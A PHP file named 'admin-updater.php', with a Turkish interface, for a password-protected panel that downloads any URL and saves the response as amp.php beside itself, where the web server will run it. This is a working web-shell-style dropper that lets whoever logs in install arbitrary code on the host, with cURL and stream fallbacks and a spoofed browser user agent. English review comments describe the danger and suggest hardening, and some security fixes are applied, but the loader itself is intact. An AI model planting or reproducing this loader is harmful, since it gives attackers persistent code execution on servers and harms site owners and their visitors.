Edit File: admin-updater.php
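<?php
/**
 * Password-gated panel that downloads a URL supplied in a form and stores the
 * response body as amp.php in the same directory as this script.
 *
 * Security review notes (for whoever operates or audits this host):
 *  - The output path ends in .php and lives next to this script, so the
 *    downloaded bytes will normally be executed by the web server the next
 *    time amp.php is requested. Functionally this is "URL in, executable code
 *    out": anyone who can log in, or who controls the remote URL, its DNS, or
 *    the network path to it, controls code running on this server.
 *  - NOTE(review): nothing here verifies what was downloaded. If this panel is
 *    really needed, deploy from a pinned, integrity-checked artifact (for
 *    example compare against an expected SHA-256) instead of a free-form URL.
 *  - NOTE(review): there is no login throttling and no audit logging; add both
 *    at the web-server or application layer.
 */

// Keep the session cookie away from page scripts and refuse session ids the
// server did not issue itself.
session_start([
    'cookie_httponly' => true,
    'use_strict_mode' => true,
]);

// Settings
// NOTE(review): this is an unsalted MD5 digest, which is cheap to brute-force
// offline if the file leaks. Replace it with a password_hash() value and check
// it with password_verify(); that needs a new stored hash from the owner, so
// the MD5 comparison is kept below and only made type-safe and constant-time.
$hashedPassword = '8cdddfc42d986d178a46b48cfdcf04d9';
$savePath = __DIR__ . '/amp.php';

/**
 * Return the per-session CSRF token, creating it on first use.
 *
 * @return string Hex encoding of 32 random bytes, stored in $_SESSION['csrf'].
 */
function generateCSRFToken()
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }

    return $_SESSION['csrf'];
}

// Login gate: everything below this block requires an authenticated session.
if (($_SESSION['authenticated'] ?? false) !== true) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
        $submitted = $_POST['password'];

        // is_string() rejects array input such as password[]=x, which would
        // otherwise make md5() fail; hash_equals() avoids a timing side channel.
        if (is_string($submitted) && hash_equals($hashedPassword, md5($submitted))) {
            // Issue a fresh session id on privilege change (session fixation).
            session_regenerate_id(true);
            $_SESSION['authenticated'] = true;
            generateCSRFToken();
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        }

        $error = "Hatalı şifre.";
    }

    echo '<!DOCTYPE html><html><head><title>Giriş</title></head><body>';
    if (isset($error)) {
        echo '<p style="color:red">' . $error . '</p>';
    }
    echo '<form method="POST">'
        . '<label>Şifre:</label><br>'
        . '<input type="password" name="password" required>'
        . '<button type="submit">Giriş</button>'
        . '</form></body></html>';
    exit;
}

/**
 * Download a URL and return its body, trying cURL first and PHP's stream
 * wrappers as fallbacks.
 *
 * Only http and https URLs are fetched; any other scheme (file, ftp, php, ...)
 * is refused so the stream fallbacks cannot be pointed at local files.
 *
 * NOTE(review): the host is not restricted, so an authenticated user can make
 * this server request internal addresses (loopback, private ranges, cloud
 * metadata endpoints), directly or through a redirect. Add a destination
 * allow-list if the panel stays in use.
 *
 * @param string $url Absolute URL to fetch.
 * @return string|false Response body, or false when every method failed.
 */
function fetchContent($url)
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;
    }

    $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36';

    // Method 1: cURL
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_MAXREDIRS => 5,
            CURLOPT_TIMEOUT => 10,
            // Certificate checks stay on: the body ends up in an executable
            // file, so an on-path attacker must not be able to substitute it.
            CURLOPT_SSL_VERIFYPEER => true,
            CURLOPT_SSL_VERIFYHOST => 2,
            // Keep redirects from switching to a non-HTTP protocol.
            CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_USERAGENT => $userAgent,
        ]);
        $data = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        if ($data !== false && $httpCode === 200) {
            return $data;
        }
    }

    // Both stream fallbacks share one context; the timeout mirrors the cURL one.
    $context = stream_context_create([
        "http" => [
            "method" => "GET",
            "header" => "User-Agent: $userAgent\r\n",
            "timeout" => 10,
        ],
    ]);

    // Method 2: file_get_contents
    if (ini_get('allow_url_fopen')) {
        // Failure is reported through the false return value, so the warning
        // is suppressed on purpose.
        $data = @file_get_contents($url, false, $context);
        if ($data !== false) {
            return $data;
        }
    }

    // Method 3: fopen + stream_context
    $handle = @fopen($url, "r", false, $context);
    if ($handle) {
        $data = stream_get_contents($handle);
        fclose($handle);
        if ($data !== false) {
            return $data;
        }
    }

    return false;
}

$success = '';
$error = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) {
    $sessionToken = $_SESSION['csrf'] ?? '';
    $postedToken = $_POST['csrf_token'];

    // Both sides must be non-empty strings before hash_equals() is called;
    // a missing session token or an array-valued field is treated as invalid.
    if (
        !is_string($sessionToken) || $sessionToken === ''
        || !is_string($postedToken)
        || !hash_equals($sessionToken, $postedToken)
    ) {
        die('Geçersiz oturum tokenı.');
    }

    $rawUrl = $_POST['target_url'] ?? '';
    $url = is_string($rawUrl) ? trim($rawUrl) : '';
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));

    // FILTER_VALIDATE_URL alone accepts non-HTTP schemes, so the scheme is
    // checked explicitly as well.
    if (!filter_var($url, FILTER_VALIDATE_URL) || !in_array($scheme, ['http', 'https'], true)) {
        $error = 'Geçersiz URL.';
    } else {
        // Cache-busting query parameter appended to the requested URL.
        $timestamp = time();
        $finalUrl = $url . (strpos($url, '?') !== false ? '&' : '?') . 'timestamp=' . $timestamp;
        $content = fetchContent($finalUrl);

        if ($content !== false) {
            // Remove any previous copy before writing the new one.
            $removedOld = file_exists($savePath) && unlink($savePath);

            if (!is_dir(dirname($savePath))) {
                mkdir(dirname($savePath), 0755, true);
            }

            // NOTE(review): $content is unverified remote data written to a
            // .php path; see the file header.
            if (file_put_contents($savePath, $content) !== false) {
                $success = 'İçerik başarıyla kaydedildi: '
                    . htmlspecialchars($finalUrl, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
                // Appended after the main message so it is no longer overwritten.
                if ($removedOld) {
                    $success .= '<br>✅ amp.php silindi';
                }
            } else {
                $error = 'Dosya kaydedilemedi!';
            }
        } else {
            $error = 'İçerik alınamadı.';
        }
    }
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <title>Fetch Paneli</title>
    <style>
        body { font-family: Arial; background: #f4f4f4; padding: 40px; }
        .box { background: #fff; padding: 20px; border-radius: 6px; max-width: 600px; margin: auto; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
        input[type=text] { width: 100%; padding: 10px; margin: 10px 0; }
        button { padding: 10px 20px; background: #007bff; color: #fff; border: none; border-radius: 4px; }
        .success { color: green; }
        .error { color: red; }
    </style>
</head>
<body>
<div class="box">
    <h2>🔐 Fetch & Replace Paneli</h2>
    <?php /* $success holds markup built above; its only dynamic part (the URL) is already escaped. */ ?>
    <?php if ($success): ?><p class="success">✅ <?= $success ?></p><?php endif; ?>
    <?php if ($error): ?><p class="error">❌ <?= htmlspecialchars($error, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?></p><?php endif; ?>
    <form method="POST">
        <label>İçerik ve Yönlendirme URL:</label>
        <input type="text" name="target_url" placeholder="https://example.com/page" required>
        <input type="hidden" name="csrf_token" value="<?= generateCSRFToken() ?>">
        <button type="submit">Gönder</button>
    </form>
</div>
</body>
</html>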